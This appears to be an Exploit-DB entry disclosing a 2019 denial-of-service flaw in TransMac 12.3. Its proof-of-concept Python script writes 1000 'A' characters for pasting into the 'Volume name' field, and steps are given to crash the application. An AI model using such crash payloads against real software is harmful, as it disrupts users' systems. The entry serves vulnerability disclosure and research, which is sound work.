TransMac 12.3 - 'Volume name' Denial of Service (PoC)

vendor:

TransMac

by:

Alejandra Sánchez

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: TransMac

Affected Version From: 12.3

Affected Version To: 12.3

Patch Exists: YES

Related CWE: N/A

CPE: a:acutesystems:transmac:12.3

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10

2019

TransMac 12.3 – ‘Volume name’ Denial of Service (PoC)

TransMac 12.3 is vulnerable to a denial of service attack when a maliciously crafted 'Volume name' is used. An attacker can create a file containing 1000 'A' characters, copy the content of the file to clipboard, open TransMac.exe, go to File > New Disk Image, paste the clipboard in 'Volume name' field, click on button -> Ok, save the new disk with any name, e.g 'exploit.dmg' and the application will crash.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

# -*- coding: utf-8 -*-
# Exploit Title: TransMac 12.3 - 'Volume name' Denial of Service (PoC)
# Date: 27/02/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://www.acutesystems.com/
# Software Link: https://www.acutesystems.com/tmac/tmsetup.exe 
# Version: 12.3
# Tested on: Windows 10


# Proof of Concept:
# 1.- Run the python script "TransMac.py", it will create a new file "TransMac.txt"
# 2.- Copy the content of the new file 'TransMac.txt' to clipboard
# 3.- Open TransMac.exe
# 4.- Go to File > New Disk Image
# 5.- Paste clipboard in 'Volume name' field
# 6.- Click on button -> Ok
# 7.- Save the new disk with any name, e.g 'exploit.dmg'
# 8.- Crashed

buffer = "\x41" * 1000
f = open ("TransMac.txt", "w")
f.write(buffer)
f.close()